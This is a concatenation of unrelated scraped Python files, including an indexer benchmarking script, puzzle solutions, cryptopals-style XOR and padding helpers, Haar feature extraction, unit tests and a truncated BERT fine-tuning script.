# CREATE INDEX CONCURRENTLY IF NOT EXISTS account_asset_asset ON account_asset (assetid, addr ASC);
def assetBalances(rooturl, assets, n=1000, minTime=None, maxTime=10, ntxns=1000):
rootparts = urllib.parse.urlparse(rooturl)
rawurl = list(rootparts)
atxnsurl = list(rootparts)
assets = list(assets.keys())
random.shuffle(assets)
count = 0
balcount = 0
start = time.time()
reporturl = None
for assetid in assets:
atxnsurl[2] = os.path.join(rawurl[2], 'v2', 'assets', str(assetid), 'balances')
query = {'limit':ntxns}
atxnsurl[4] = urllib.parse.urlencode(query)
pageurl = urllib.parse.urlunparse(atxnsurl)
if reporturl is None:
reporturl = pageurl
logger.debug('GET %s', pageurl)
response = urllib.request.urlopen(pageurl)
if (response.code != 200) or not response.getheader('Content-Type').startswith('application/json'):
raise Exception("bad response to {!r}: {}".format(pageurl, response.reason))
ob = json.loads(response.read())
bals = ob.get('balances', [])
balcount += len(bals)
count += 1
dt = time.time() - start
if (n and (count >= n)) and (not minTime or (dt > minTime)):
break
if not n and minTime and (dt > minTime):
break
if maxTime and (dt > maxTime):
break
logger.info('asset balances: %d assets in %0.2f seconds, %.1f /s; %d bals, %.1f bal/s', count, dt, count/dt, balcount, balcount/dt)
return {'url':reporturl, 'assets': count, 'seconds': dt, 'balances': balcount}
# TODO:
# /v2/applications -- this should be fast because it's a single table scan
# /v2/applications/N -- single row lookup, easy
# /v2/assets/{asset-id} -- single row lookup, easy
# /v2/blocks/{round-number} -- single row lookup, easy
# /v2/transactions what search opts?
def main():
import argparse
ap = argparse.ArgumentParser()
ap.add_argument('--indexer', default='http://localhost:8980', help='URL to indexer to fetch from, default http://localhost:8980')
ap.add_argument('--accounts', type=bool, default=True)
ap.add_argument('--no-accounts', dest='accounts', action='store_false')
ap.add_argument('--assets', type=bool, default=True)
ap.add_argument('--no-assets', dest='assets', action='store_false')
ap.add_argument('--verbose', default=False, action='store_true')
args = ap.parse_args()
if args.verbose:
logging.basicConfig(level=logging.DEBUG)
else:
logging.basicConfig(level=logging.INFO)
indexerurl = args.indexer
if not indexerurl.startswith('http://'):
indexerurl = 'http://' + indexerurl
report = []
if args.accounts:
accounts, rept = getAccountList(indexerurl)
report.append(rept)
rept = accountRandom(indexerurl, accounts, n=1000, minTime=1, maxTime=30)
report.append(rept)
rept = accountRecents(indexerurl, accounts, n=1000, minTime=1, maxTime=30)
report.append(rept)
if args.assets:
assets, rept = getAssets(indexerurl)
report.append(rept)
rept = assetTxns(indexerurl, assets)
report.append(rept)
rept = assetBalances(indexerurl, assets)
report.append(rept)
json.dump(report, sys.stdout)
sys.stdout.write('\n')
return 0
if __name__ == '__main__':
sys.exit(main())
| StarcoderdataPython |
4829263 | #!/usr/bin/env python
import re
import itertools
people = set()
relationships = dict()
total = 0
with open('../inputs/13.txt') as f:
for line in f:
m = re.match(r'(\w+) would (gain|lose) (\d+) happiness units by sitting next to (\w+).', line)
(p1, operand, value, p2) = m.groups()
value = int(value)
if operand == 'lose':
value = -value;
people.add(p1)
people.add(p2)
if p1 not in relationships:
relationships[p1] = dict()
if p2 not in relationships:
relationships[p2] = dict()
relationships[p1][p2] = value
# Add myself.
relationships['myself'] = dict()
for p in people:
relationships['myself'][p] = 0
relationships[p]['myself'] = 0
people.add('myself')
for arrangement in itertools.permutations(people):
components = []
happiness = 0
for i in range(-1, len(arrangement) - 1):
p1 = arrangement[i]
p2 = arrangement[i + 1]
happiness += relationships[p1][p2]
happiness += relationships[p2][p1]
if total == 0 or total < happiness:
total = happiness
print total
| StarcoderdataPython |
1799489 | import h5py
import random
import numpy as np
class DataGenerator:
"""
Class for a generator that reads in data from the HDF5 file, one batch at
a time, converts it into the jigsaw, and then returns the data
"""
def __init__(self, conf, maxHammingSet):
"""
Explain
"""
self.data_path = conf.data_path
self.numChannels = conf.numChannels
self.numCrops = conf.numCrops
self.cropSize = conf.cropSize
self.cellSize = conf.cellSize
self.tileSize = conf.tileSize
self.colorJitter = conf.colorJitter
self.batchSize = conf.batchSize
self.meanTensor, self.stdTensor = self.get_stats()
self.maxHammingSet = np.array(maxHammingSet, dtype=np.uint8)
self.batch_counter()
self.numClasses = self.maxHammingSet.shape[0] # i.e. number of jigsaw types
def get_stats(self):
h5f = h5py.File(self.data_path, 'r')
mean = h5f['train_mean'][:].astype(np.float32)
std = h5f['train_std'][:].astype(np.float32)
h5f.close()
if self.numChannels == 1:
mean = np.expand_dims(mean, axis=-1)
std = np.expand_dims(std, axis=-1)
return mean, std
def batch_counter(self):
h5f = h5py.File(self.data_path, 'r')
self.numTrainBatch = h5f['train_img'][:].shape[0] // self.batchSize
self.numValBatch = h5f['val_img'][:].shape[0] // self.batchSize
self.numTestBatch = h5f['test_img'][:].shape[0] // self.batchSize
h5f.close()
self.batchIndexTrain = 0
self.batchIndexVal = 0
self.batchIndexTest = 0
def __batch_generation_normalized(self, x):
"""
Explain
"""
x -= self.meanTensor
x /= self.stdTensor
# This implementation modifies each image individually
y = np.empty(self.batchSize)
# Python list of 4D numpy tensors for each channel
X = [np.empty((self.batchSize, self.tileSize, self.tileSize, self.numChannels), np.float32)
for _ in range(self.numCrops)]
for image_num in range(self.batchSize):
# Transform the image into its nine crops
single_image, y[image_num] = self.create_croppings(x[image_num])
for image_location in range(self.numCrops):
X[image_location][image_num, :, :, :] = single_image[:, :, :, image_location]
return X, y
def one_hot(self, y):
"""
Explain
"""
return np.array([[1 if y[i] == j else 0 for j in range(self.numClasses)] for i in range(y.shape[0])])
def generate(self, mode='train'):
"""
Explain
"""
if mode == 'train':
h5f = h5py.File(self.data_path, 'r')
x = h5f['train_img'][self.batchIndexTrain * self.batchSize:(self.batchIndexTrain + 1) * self.batchSize, ...]
h5f.close()
if self.numChannels == 1:
x = np.expand_dims(x, axis=-1)
X, y = self.__batch_generation_normalized(x.astype(np.float32))
self.batchIndexTrain += 1 # Increment the batch index
if self.batchIndexTrain == self.numTrainBatch:
self.batchIndexTrain = 0
elif mode == 'valid':
h5f = h5py.File(self.data_path, 'r')
x = h5f['val_img'][self.batchIndexVal * self.batchSize:(self.batchIndexVal + 1) * self.batchSize, ...]
h5f.close()
if self.numChannels == 1:
x = np.expand_dims(x, axis=-1)
X, y = self.__batch_generation_normalized(x.astype(np.float32))
self.batchIndexVal += 1 # Increment the batch index
if self.batchIndexVal == self.numValBatch:
self.batchIndexVal = 0
elif mode == 'test':
h5f = h5py.File(self.data_path, 'r')
x = h5f['test_img'][self.batchIndexTest * self.batchSize:(self.batchIndexTest + 1) * self.batchSize, ...]
h5f.close()
if self.numChannels == 1:
x = np.expand_dims(x, axis=-1)
X, y = self.__batch_generation_normalized(x.astype(np.float32))
self.batchIndexTest += 1 # Increment the batch index
if self.batchIndexTest == self.numTestBatch:
self.batchIndexTest = 0
return np.transpose(np.array(X), axes=[1, 2, 3, 4, 0]), self.one_hot(y)
def randomize(self):
""" Randomizes the order of data samples"""
h5f = h5py.File(self.data_path, 'a')
train_img = h5f['train_img'][:].astype(np.float32)
permutation = np.random.permutation(train_img.shape[0])
train_img = train_img[permutation, :, :, :]
del h5f['train_img']
h5f.create_dataset('train_img', data=train_img)
h5f.close()
def create_croppings(self, image):
"""
Take in a 3D numpy array (256x256x3) and a 4D numpy array containing 9 "jigsaw" puzzles.
Dimensions of the output array is 64 (height) x 64 (width) x 3 (colour channels) x 9(each cropping)
The 3x3 grid is numbered as follows:
0 1 2
3 4 5
6 7 8
"""
# Jitter the colour channel
# image = self.color_channel_jitter(image)
y_dim, x_dim = image.shape[:2]
# Have the x & y coordinate of the crop
if x_dim != self.cropSize:
crop_x = random.randrange(x_dim - self.cropSize)
crop_y = random.randrange(y_dim - self.cropSize)
else:
crop_x, crop_y = 0, 0
# Select which image ordering we'll use from the maximum hamming set
perm_index = random.randrange(self.numClasses)
final_crops = np.zeros((self.tileSize, self.tileSize, self.numChannels, self.numCrops), dtype=np.float32)
n_crops = int(np.sqrt(self.numCrops))
for row in range(n_crops):
for col in range(n_crops):
x_start = crop_x + col * self.cellSize + random.randrange(self.cellSize - self.tileSize)
y_start = crop_y + row * self.cellSize + random.randrange(self.cellSize - self.tileSize)
# Put the crop in the list of pieces randomly according to the number picked
final_crops[:, :, :, self.maxHammingSet[perm_index, row * n_crops + col]] = \
image[y_start:y_start + self.tileSize, x_start:x_start + self.tileSize, :]
return final_crops, perm_index
def color_channel_jitter(self, image):
"""
Explain
"""
# Determine the dimensions of the array, minus the crop around the border
# of 4 pixels (threshold margin due to 2 pixel jitter)
x_dim = image.shape[0] - self.colorJitter * 2
y_dim = image.shape[1] - self.colorJitter * 2
# Determine the jitters in all directions
R_xjit = random.randrange(self.colorJitter * 2 + 1)
R_yjit = random.randrange(self.colorJitter * 2 + 1)
# Seperate the colour channels
return_array = np.empty((x_dim, y_dim, 3), np.float32)
for colour_channel in range(3):
return_array[:, :, colour_channel] = \
image[R_xjit:x_dim +R_xjit, R_yjit:y_dim + R_yjit, colour_channel]
return return_array
| StarcoderdataPython |
32397 | import datetime
import pytz
from tws_async import *
stocks = [
Stock('TSLA'),
Stock('AAPL'),
Stock('GOOG'),
Stock('INTC', primaryExchange='NASDAQ')
]
forexs = [
Forex('EURUSD'),
Forex('GBPUSD'),
Forex('USDJPY')
]
endDate = datetime.date.today()
startDate = endDate - datetime.timedelta(days=7)
histReqs = []
for date in util.dateRange(startDate, endDate):
histReqs += [HistRequest(stock, date) for stock in stocks]
histReqs += [HistRequest(forex, date, whatToShow='MIDPOINT',
durationStr='30 D', barSizeSetting='1 day') for forex in forexs]
timezone = datetime.timezone.utc
# timezone = pytz.timezone('Europe/Amsterdam')
# timezone = pytz.timezone('US/Eastern')
util.logToConsole()
tws = HistRequester()
tws.connect('127.0.0.1', 7497, clientId=1)
task = tws.download(histReqs, rootDir='data', timezone=timezone)
tws.run(task)
| StarcoderdataPython |
86718 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Sep 13 16:00:40 2018
@author: co-well-752410
"""
import sys
import cv2
import numpy as np
import tensorflow as tf
import tensorflow.python.platform
import os
import configparser
# 外部のコンフィグを読み込む
inifile = configparser.ConfigParser()
inifile.read('config1.ini')
# 入力画像ディレクトリのパス。最後はスラッシュで終わる必要あり。
in_dir = inifile.get('extraction', 'out')
names = os.listdir(in_dir)
i=0
y=0
for name in names:
if not "." in name:
f1 = open('trainlabel.txt','a')
f1.write(name+' '+ str(y)+'\n')
f1.close()
in_dir_characters=os.listdir(in_dir+'/'+name+'/')
for in_dir_character in in_dir_characters:
if not "DS_Store" in in_dir_character:
f = open('train.txt','a')
f.write(name+'/'+in_dir_character+' '+ str(i)+'\n')
f.close()
i +=1
y +=1
i=0 | StarcoderdataPython |
1775454 | <reponame>akashsuper2000/codechef-archive
def sod(n):
s = 0
while n:
s += n % 10
n //= 10
return s
from math import gcd
k = 10**9+7
for i in range(int(input())):
l,r = [int(j) for j in input().split()]
a = [j for j in range(l,r+1)]
a = [sod(j) for j in a]
c = 0
for j in range(r-l+1):
for k in range(j+1,r-l+1):
if gcd(a[j],a[k])==1:
c = c+1
print(c%k)
| StarcoderdataPython |
4835078 | <reponame>uberj/newfriends<gh_stars>0
import string
import math
import random
from pprint import pprint
# Everything that uses BitArray needs to be removed. I used this early on before I knew about how nice bytes are
from bitstring import BitArray as BA
SAMPLE_TEXT = """
Yo, VIP, let's kick it!
Ice Ice Baby, Ice Ice Baby
All right stop, Collaborate and listen
Ice is back with my brand new invention
Something grabs a hold of me tightly
Flow like a harpoon daily and nightly
Will it ever stop? Yo, I don't know
Turn off the lights and I'll glow
To the extreme I rock a mic like a vandal
Light up a stage and wax a chump like a candle.
Dance, go rush the speaker that booms
I'm killing your brain like a poisonous mushroom
Deadly, when I play a dope melody
Anything less than the best is a felony
Love it or leave it, you better gain way
You better hit bull's eye, the kid don't play
If there was a problem, yo, I'll solve it
Check out the hook while my DJ revolves it
Ice Ice Baby Vanilla, Ice Ice Baby Vanilla
Ice Ice Baby Vanilla, Ice Ice Baby Vanilla
Now that the party is jumping
With the bass kicked in, and the Vegas are pumpin'
Quick to the point, to the point, no faking
Cooking MCs like a pound of bacon
Burning them they ain't quick and nimble
I go crazy when I hear a cymbal
And a hi hat with a souped up tempo
I'm on a roll and it's time to go solo
Rollin' in my 5.0
With my ragtop down so my hair can blow
The girlies on standby, waving just to say, "Hi!"
Did you stop? No, I just drove by
Kept on pursuing to the next stop
I busted a left and I'm heading to the next block
That block was dead Yo
So I continued to A1A Beachfront Ave.
Girls were hot wearing less than bikinis
Rockman lovers driving Lamborghinis
Jealous 'cause I'm out getting mine
Shay with a gauge and Vanilla with a nine
Ready for the chumps on the wall
The chumps acting ill because they're so full of "Eight Ball"
Gunshots ranged out like a bell
I grabbed my nine, all I heard was shells
Falling on the concrete real fast
Jumped in my car, slammed on the gas
Bumper to bumper, the avenue's packed
I'm trying to get away before the jackers jack
Police on the scene, you know what I mean
They passed me up, confronted all the dope fiends
If there was a problem, yo, I'll solve it
Check out the hook while my DJ revolves it
Ice Ice Baby Vanilla, Ice Ice Baby Vanilla
Ice Ice Baby Vanilla, Ice Ice Baby Vanilla
Take heed, 'cause I'm a lyrical poet
Miami's on the scene just in case you didn't know it
My town, that created all the bass sound
Enough to shake and kick holes in the ground
'Cause my style's like a chemical spill
Feasible rhymes that you can vision and feel
Conducted and formed, this is a hell of a concept
We make it hype and you want to step with this
Shay plays on the fade, slice like a ninja
Cut like a razor blade so fast, other DJs say, "Damn."
If my rhyme was a drug, I'd sell it by the gram
Keep my composure when it's time to get loose
Magnetized by the mic while I kick my juice
If there was a problem, Yo, I'll solve it!
Check out the hook while D-Shay revolves it.
Ice Ice Baby Vanilla, Ice Ice Baby Vanilla
Ice Ice Baby Vanilla, Ice Ice Baby Vanilla
Yo, man, let's get out of here! Word to your mother!
Ice Ice Baby Too cold, Ice Ice Baby Too cold Too cold
Ice Ice Baby Too cold Too cold, Ice Ice Baby Too cold Too cold
"""
LETTER_FREQ = {'\n': 2.8952504879635654, 'y': 2.6675341574495772, 'o': 5.823031880286272, ',': 1.398828887443071,
' ': 17.56668835393624, 'v': 1.1711125569290826, 'i': 6.701366297983085, 'p': 1.5289525048796355,
'l': 4.912166558230319, 'e': 8.295380611581002, 't': 5.790500975927131, "'": 0.9433962264150944,
's': 3.610930383864672, 'k': 1.5289525048796355, 'c': 3.4482758620689653, '!': 0.16265452179570591,
'b': 2.47234873129473, 'a': 6.701366297983085, 'r': 2.504879635653871, 'g': 1.594014313597918,
'h': 3.610930383864672, 'n': 4.4567338972023425, 'd': 2.5699414443721533, 'w': 1.3662979830839297,
'm': 2.147039687703318, 'f': 0.9108653220559532, '?': 0.06506180871828238, 'u': 1.951854261548471,
'x': 0.13012361743656475, '.': 0.16265452179570591, 'j': 0.4229017566688354, 'q': 0.06506180871828238,
'z': 0.09759271307742355, '5': 0.03253090435914119, '0': 0.03253090435914119, '"': 0.1951854261548471,
'1': 0.03253090435914119, '-': 0.03253090435914119}
def ints_to_hex(ints: [int]) -> str:
s = ""
for i in ints:
s += hex(i)[2:].rjust(4, "0")
return s
def hex_to_ints(hex_s: str) -> [int]:
if len(hex_s) % 2 == 1:
hex_s = "0" + hex_s
cur = 0
empty_cur = True
ns = []
for i in range(0, len(hex_s) - 1, 2):
b0 = int(hex_s[i], 16)
b1 = int(hex_s[i + 1], 16)
empty_cur = False
if i != 0 and i % 3 == 0:
ns.append(cur)
cur = 0
empty_cur = True
cur = (cur << 8) + (b0 << 4) + b1
if not empty_cur:
ns.append(cur)
return ns
def zip_bytes(buff0, buff1, default=0) -> [(int, int)]:
for i in range(max(len(buff0), len(buff1))):
a = default
b = default
if i < len(buff0):
a = buff0[i]
if i < len(buff1):
b = buff1[i]
yield (a, b)
def xor(a: bytes, b: bytes) -> bytes:
xor_ints = []
for ai, bi in zip(a, b):
xor_ints.append(ai ^ bi)
return bytes(xor_ints)
def word_dictionary():
with open("/usr/share/dict/words", "r") as fd:
return set([word.strip() for word in fd.readlines()])
WORD_DICTIONARY = word_dictionary()
def dictionary_word_count(candidate: BA):
s = to_str(candidate)
count = 0
split = s.split(" ")
for word in split:
if word in WORD_DICTIONARY:
count += 1
return float(count) / len(split)
def to_str(candidate: BA) -> str:
return "".join([chr(b) for b in candidate.bytes])
def str_to_ba(i: str) -> BA:
return BA(i.encode())
VALID_LETTERS = set(string.ascii_letters)
def valid_letter_count_percentage(candidate: BA) -> float:
count = 0
for c in candidate.bytes:
if chr(c) in VALID_LETTERS:
count += 1
return float(count) / len(candidate.bytes)
def pad16_PKCS7(s: bytes) -> bytes:
hangover = 16 - (len(s) % 16)
return s + (chr(hangover).encode()) * hangover
class PaddingException(Exception):
pass
def unpad16_PKCS7(padded: bytes) -> bytes:
expected_pad_count = padded[-1]
if expected_pad_count > 16:
raise PaddingException("Bad padding")
expected_pad = (chr(expected_pad_count) * expected_pad_count).encode()
if not padded.endswith(expected_pad):
raise PaddingException("Bad padding")
return padded.rstrip(expected_pad)
def pad8(candidate: BA) -> BA:
hangover = 8 - (len(candidate) % 8)
if hangover != 8:
candidate += BA("0x0") * (hangover / 4)
return candidate
def realistic_letter_distribution(candidate: BA) -> float:
# pad candidate to get to a byte valid string so we can convert it
candidate = pad8(candidate)
s = to_str(candidate).lower()
return realistic_letter_distribution_(s)
def realistic_letter_distribution_(s: str) -> float:
score = 0
uniq_chars = set(s)
for c in uniq_chars:
# number of times c appears in s
num_c_in_s = len(list(filter(lambda x: x == c, s)))
# frequency of c in s
p_c = (num_c_in_s / len(s)) * 100
if c in LETTER_FREQ:
error = math.fabs(LETTER_FREQ.get(c) - p_c * 10)
score -= error
else:
score -= 300
return score / len(uniq_chars)
def hamming_weight(a, b):
return (a ^ b).count(True)
def xor_cycle_encrypt(key: BA, m: BA) -> BA:
e = key * math.ceil(float(len(m)) / len(key))
e = e[:len(m)]
assert len(e) == len(m)
return e ^ m
def find_best_key(e: BA) -> chr:
scores = []
for c in map(chr, range(256)):
i = ord(c)
ks = int((len(e) / 8))
key = BA(hex(i)) * ks
if len(key) < len(e):
key = key * 2
assert len(key) == len(e), "len(key)=%s len(e)=%s" % (len(key), len(e))
candidate = (e ^ key)
scores.append((realistic_letter_distribution(candidate), c))
best = sorted(scores, key=lambda x: x[0])
return best[-1][1]
def top_n_decrypt_key(n: int, e: BA) -> [(int, chr, str)]:
scores = attempt_all_keys(e)
l = list(reversed(sorted(scores, key=lambda x: x[0])))
return l[:n]
def best_decrypt_key(e: BA) -> (int, chr, str):
scores = attempt_all_keys(e)
l = list(reversed(sorted(scores, key=lambda x: x[0])))
return l[0]
def attempt_all_keys(e: BA) -> [(int, chr, str, BA)]:
scores = []
e = pad8(e)
for i in range(1, 256):
if i < 16:
key = BA(hex(i) * int(len(e) / float(4)))
else:
key = BA(hex(i) * int(len(e) / float(8)))
candidate = (e ^ key)
scores.append((realistic_letter_distribution(candidate), chr(i), to_str(candidate), candidate, e))
return scores
def top_n_key_sizes(n: int, e: BA) -> [(int, int)]:
distances = []
for guess_key_size in range(1, min(50, len(e.bytes))):
bs = list(e.cut(guess_key_size * 8))
if not bs or len(bs) == 1:
continue
ds = []
for i in range(len(bs) - 1):
b0 = bs[i]
b1 = bs[i + 1]
ds.append(hamming_weight(b0, b1) / float(guess_key_size))
distance = sum(ds) / float(len(ds))
distances.append((guess_key_size, distance))
return list(sorted(distances, key=lambda x: x[1]))[:n]
def bytes_to_ba(bs: [int]) -> BA:
l = []
for b in bs:
if b == 0:
l.append("0x00")
elif b < 15:
l.append("0x0" + hex(b))
else:
l.append(hex(b))
i = map(lambda s: s[2:], l)
s = "0x" + "".join(i)
return BA(s)
def transpose(e: BA, ks: int) -> [BA]:
blocks = []
for i in range(ks):
ith_blocks = []
for j in range(i, len(e.bytes), ks):
b = e.bytes[j]
ith_blocks.append(b)
ba = bytes_to_ba(ith_blocks)
blocks.append(ba)
return blocks
def rand_n_string(n):
return "".join([random.choice(string.printable) for _ in range(n)])
| StarcoderdataPython |
71853 | <reponame>jinchengli97/Viola-Jones-Facial-Recognition<gh_stars>0
from myfoobar import int_img, Harr1, Harr2, Harr3, Harr4
import matplotlib.image as mpimg
import numpy as np
import os
import time
img_dir_faces = 'C:/Users/lijin/Desktop/Fall 2020/ECEN649/Project/trainset/faces/'
img_dir_non_faces = 'C:/Users/lijin/Desktop/Fall 2020/ECEN649/Project/trainset/non-faces/'
Harr1Map = np.load('Harr1Map.npy')
Harr2Map = np.load('Harr2Map.npy')
Harr3Map = np.load('Harr3Map.npy')
Harr4Map = np.load('Harr4Map.npy')
HarrMap = np.load('HarrMap.npy')
# ------------------------------------------
tic = time.time()
# ------------------------------------------
# training faces
data_path = os.listdir(img_dir_faces)
trainingset = []
for f1 in data_path:
HF = []
img_path = img_dir_faces + f1
img = mpimg.imread(img_path)
imglength = len(img)
integral_image = img.copy()
int_img(integral_image, imglength)
for location in Harr1Map:
HF.append(Harr1(integral_image, location))
for location in Harr2Map:
HF.append(Harr2(integral_image, location))
for location in Harr3Map:
HF.append(Harr3(integral_image, location))
for location in Harr4Map:
HF.append(Harr4(integral_image, location))
label = [1]
feature = HF + label
trainingset.append(feature)
# ------------------------------------------
# training non faces
data_path = os.listdir(img_dir_non_faces)
for f1 in data_path:
HF = []
img_path = img_dir_non_faces + f1
img = mpimg.imread(img_path)
imglength = len(img)
integral_image = img.copy()
int_img(integral_image, imglength)
for location in Harr1Map:
HF.append(Harr1(integral_image, location))
for location in Harr2Map:
HF.append(Harr2(integral_image, location))
for location in Harr3Map:
HF.append(Harr3(integral_image, location))
for location in Harr4Map:
HF.append(Harr4(integral_image, location))
label = [-1]
feature = HF + label
trainingset.append(feature)
# ------------------------------------------
toc = time.time()
# ------------------------------------------
print('total time = ', toc-tic, 's')
trainingset = np.array(trainingset)
np.save('trainingset.npy', trainingset)
| StarcoderdataPython |
153739 | """
Do Not Edit this file. You may and are encouraged to look at it for reference.
"""
import unittest
import re
import gas_mileage
class TestListTrips(unittest.TestCase):
def verifyLines(self, notebook, mpg):
from gas_mileage import listTrips
trips = listTrips(notebook)
self.assertTrue(type(trips) is list, 'listTrips did not return a list')
self.assertTrue(len(trips) == len(notebook))
for i in range(len(trips)):
nb = notebook[i]
matchdate = nb['date']
matchmiles = str(nb['miles']) + ' miles'
matchgallons = str(nb['gallons']) + ' gallons'
matchmpg = str(mpg[i]) + ' mpg'
trip = trips[i]
self.assertTrue(matchdate.lower() in trip.lower(), '"' + nb['date'] + '" not found in "' + trip + '"')
self.assertTrue(matchmiles.lower() in trip.lower(),
'"' + str(nb['miles']) + ' miles" not found in "' + trip + '"')
self.assertTrue(matchgallons.lower() in trip.lower(),
'"' + str(nb['gallons']) + ' gallons" not found in "' + trip + '"')
self.assertTrue(matchmpg.lower() in trip.lower(), '"' + str(mpg[i]) + ' MPG" not found in "' + trip + '"')
def test001_listTripsExists(self):
self.assertTrue('listTrips' in dir(gas_mileage),
'Function "listTrips" is not defined, check your spelling')
return
def test002_listTripsEmptyNotebook(self):
from gas_mileage import listTrips
notebook = []
lines = listTrips(notebook)
self.assertTrue(type(lines) is list, 'listTrips did not return a list')
self.assertTrue(len(lines) == 0, 'There were no trips but you returned lines')
def test003_listTrips(self):
notebook = [
{'date': '01/01/2017', 'miles': 300.0, 'gallons': 10.0},
{'date': '01/05/2017', 'miles': 182.0, 'gallons': 7.0},
{'date': '01/15/2017', 'miles': 240.0, 'gallons': 9.6}
]
mpg = [30.0, 26.0, 25.0]
self.verifyLines(notebook, mpg)
def test004_listTrips(self):
notebook = [
{'date': 'Jan 01', 'miles': 45.0, 'gallons': 1.5},
{'date': 'Jan 05', 'miles': 405.0, 'gallons': 15.0}
]
mpg = [30.0, 27.0]
self.verifyLines(notebook, mpg)
if __name__ == '__main__':
unittest.main()
| StarcoderdataPython |
34158 | # Copyright 2018 <NAME>, <NAME>.
# (Strongly inspired by original Google BERT code and Hugging Face's code)
""" Fine-tuning on A Classification Task with pretrained Transformer """
import itertools
import csv
import fire
import torch
import torch.nn as nn
from torch.utils.data import Dataset, DataLoader
import tokenization
import models
import optim
import train
import pdb
import numpy as np
import pandas as pd
from utils import set_seeds, get_device, truncate_tokens_pair
import os
def read_explanations(path):
header = []
uid = None
df = pd.read_csv(path, sep='\t', dtype=str)
for name in df.columns:
if name.startswith('[SKIP]'):
if 'UID' in name and not uid:
uid = name
else:
header.append(name)
if not uid or len(df) == 0:
print('Possibly misformatted file: ' + path)
return []
return df.apply(lambda r: (r[uid], ' '.join(str(s) for s in list(r[header]) if not pd.isna(s))), 1).tolist()
tables = '/data/jacob/code/nlp/tfidf/data/annotation/expl-tablestore-export-2017-08-25-230344/tables'
questions = '/data/jacob/code/nlp/tfidf/data/questions/ARC-Elementary+EXPL-Dev.tsv'
def parse_e(e):
l = e.split(' ')
l = [ll.split('|')[0] for ll in l]
return l
class CsvDataset(Dataset):
""" Dataset Class for CSV file """
labels = None
def __init__(self, pipeline=[]): # cvs file and pipeline object
Dataset.__init__(self)
explanations = []
for path, _, files in os.walk(tables):
for file in files:
explanations += read_explanations(os.path.join(path, file))
if not explanations:
warnings.warn('Empty explanations')
df_q = pd.read_csv(questions, sep='\t', dtype=str)
df_e = pd.DataFrame(explanations, columns=('uid', 'text'))
# pdb.set_trace()
q_list = []
e_list = []
dict_e = {}
num_e = len(df_e['uid'])
num_q = len(df_q['questionID'])
for i in range(num_e):
dict_e[df_e['uid'][i]]= df_e['text'][i]
for i in range(num_q):
if not df_q['explanation'][i] is np.nan:
q_list.append(df_q['Question'][i])
e_list.append(parse_e(df_q['explanation'][i]))
self.q_list = q_list
self.e_list = e_list
self.dict_e = dict_e
self.pipeline = pipeline
self.es = list(dict_e.keys())
self.num_neg = 75
# pdb.set_trace()
# data = []
# with open(file, "r") as f:
# # list of splitted lines : line is also list
# lines = csv.reader(f, delimiter='\t', quotechar=None)
# pdb.set_trace()
# for instance in self.get_instances(lines): # instance : tuple of fields
# for proc in pipeline: # a bunch of pre-processing
# instance = proc(instance)
# data.append(instance)
# # To Tensors
# self.tensors = [torch.tensor(x, dtype=torch.long) for x in zip(*data)]
def __len__(self):
return len(self.q_list)
def __getitem__(self, index):
# pdb.set_trace()
q = self.q_list[index]
e = self.e_list[index]
pos = self.dict_e[np.random.choice(e)]
# neg = []
samples = []
instance = ('1', q, pos)
for proc in self.pipeline:
instance = proc(instance)
samples.append(instance)
for i in range(self.num_neg):
# pdb.set_trace()
neg = self.dict_e[np.random.choice(self.es)]
instance = ('0', q, neg)
for proc in self.pipeline:
instance = proc(instance)
samples.append(instance)
# pdb.set_trace()
data = [torch.tensor(x, dtype=torch.long) for x in zip(*samples)]
# data = [d for d in zip(data)]
return data
class Pipeline():
""" Preprocess Pipeline Class : callable """
def __init__(self):
super().__init__()
def __call__(self, instance):
raise NotImplementedError
class Tokenizing(Pipeline):
""" Tokenizing sentence pair """
def __init__(self, preprocessor, tokenize):
super().__init__()
self.preprocessor = preprocessor # e.g. text normalization
self.tokenize = tokenize # tokenize function
def __call__(self, instance):
label, text_a, text_b = instance
label = self.preprocessor(label)
tokens_a = self.tokenize(self.preprocessor(text_a))
tokens_b = self.tokenize(self.preprocessor(text_b)) \
if text_b else []
return (label, tokens_a, tokens_b)
class AddSpecialTokensWithTruncation(Pipeline):
""" Add special tokens [CLS], [SEP] with truncation """
def __init__(self, max_len=512):
super().__init__()
self.max_len = max_len
def __call__(self, instance):
label, tokens_a, tokens_b = instance
# -3 special tokens for [CLS] text_a [SEP] text_b [SEP]
# -2 special tokens for [CLS] text_a [SEP]
_max_len = self.max_len - 3 if tokens_b else self.max_len - 2
truncate_tokens_pair(tokens_a, tokens_b, _max_len)
# Add Special Tokens
tokens_a = ['[CLS]'] + tokens_a + ['[SEP]']
tokens_b = tokens_b + ['[SEP]'] if tokens_b else []
return (label, tokens_a, tokens_b)
class TokenIndexing(Pipeline):
""" Convert tokens into token indexes and do zero-padding """
def __init__(self, indexer, labels, max_len=512):
super().__init__()
self.indexer = indexer # function : tokens to indexes
# map from a label name to a label index
self.label_map = {name: i for i, name in enumerate(labels)}
self.max_len = max_len
def __call__(self, instance):
label, tokens_a, tokens_b = instance
input_ids = self.indexer(tokens_a + tokens_b)
segment_ids = [0]*len(tokens_a) + [1]*len(tokens_b) # token type ids
input_mask = [1]*(len(tokens_a) + len(tokens_b))
label_id = self.label_map[label]
# zero padding
n_pad = self.max_len - len(input_ids)
input_ids.extend([0]*n_pad)
segment_ids.extend([0]*n_pad)
input_mask.extend([0]*n_pad)
return (input_ids, segment_ids, input_mask, label_id)
class Classifier(nn.Module):
""" Classifier with Transformer """
def __init__(self, cfg, n_labels):
super().__init__()
self.transformer = models.Transformer(cfg)
self.fc = nn.Linear(cfg.dim, cfg.dim)
self.activ = nn.Tanh()
self.drop = nn.Dropout(cfg.p_drop_hidden)
self.classifier = nn.Linear(cfg.dim, n_labels)
def forward(self, input_ids, segment_ids, input_mask):
h = self.transformer(input_ids, segment_ids, input_mask)
# only use the first h in the sequence
pooled_h = self.activ(self.fc(h[:, 0]))
logits = self.classifier(self.drop(pooled_h))
logits = torch.exp(logits).clamp(0, 100)
return logits
#pretrain_file='../uncased_L-12_H-768_A-12/bert_model.ckpt',
#pretrain_file='../exp/bert/pretrain_100k/model_epoch_3_steps_9732.pt',
def neg_logloss(logits):
score = logits[0] / logits.sum()
loss = -torch.log(score+1e-4)
return loss
def main(task='mrpc',
train_cfg='config/train_mrpc.json',
model_cfg='config/bert_base.json',
data_file='../glue/MRPC/train.tsv',
model_file=None,
pretrain_file='../uncased_L-12_H-768_A-12/bert_model.ckpt',
data_parallel=True,
vocab='../uncased_L-12_H-768_A-12/vocab.txt',
save_dir='../exp/bert/mrpc',
max_len=128,
mode='train'):
